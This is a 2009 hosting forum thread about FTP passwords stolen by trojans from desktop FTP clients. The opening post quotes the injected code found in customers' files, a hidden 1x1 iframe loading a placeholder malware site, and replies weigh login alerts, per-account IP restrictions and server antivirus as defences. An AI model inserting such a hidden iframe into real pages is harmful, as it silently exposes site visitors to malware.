FTP Login Notifications

Xterm · Post by **Xterm** » 21 Apr 2009, 08:09

Hello!

Thank you for your very good scripts.

Recently, my customers were complaining that their scripts contain the following code:

Code: Select all

<iframe src="BADWARESITE" width=1 height=1 style="visibility: hidden"></iframe>

This happens because the malicious software that gets account password from FTP clients (most popular - TotalCommander, FlashFXP, FileZilla etc.)

This is really very big problem and I find solution for this.
For example, server can send notification if user login to FTP (notification must send to main account email) like SSH login alert in CSF. This help customers to track FTP activity and prevent changes in files.

For example - email to customer:

======
Subject: FTP Login alert - user: userlogin
You can cancel this session using this link.
======

I think this can help customers, and would be grateful if it were added in future versions of CSF.

Any ideas or tips?

Best Regards,
Aleksey.

Post by **chirpy** » 25 Apr 2009, 10:55

I'll think about it. However, I'm not sure about the practicality of informing the FTP account owner as authentication can be done in a variety of ways and the only method of doing this would be to a unix account in /etc/passwd which might not even receive email. To that end, the feature would only email the root forwarder (or otherwise designated recipient of the lfd reports). It could also mean a lot of emails being sent, so would be a feature you'd only want to enable for a very short period of time (e.g. we have several clients who upload webcam images ever minute and that would mean an email to root onece a minute for each of those).

wdt · Post by **wdt** » 25 Apr 2009, 11:30

This problem appear because clients don't use an antivirus and their cPanel/FTP password is stolen by trojans and used later to modify files on FTP (most time) or in cPanel file manager.

The best way to prevent this is to restrict FTP login to some IPs. Unfortunately, this cannot be set globally for a shared-hosting server and should be activated on each user account with different set of IPs. In this case, restriction should be at FTP login level, not at firewall level (and of cource, should be done by cPanel, for example a new button in user cpanel)

Viruses/trojan will evolve and will inject malicious code directly from client computer/IP and in this case IP restrictions won't work. Other security methods should be used: ex: certificate authentication instead of password, antivirus on server level. ClamAV only detect a part of this injections. Hope the new Kaspersky for Linux will do a better job, like the one for Windows.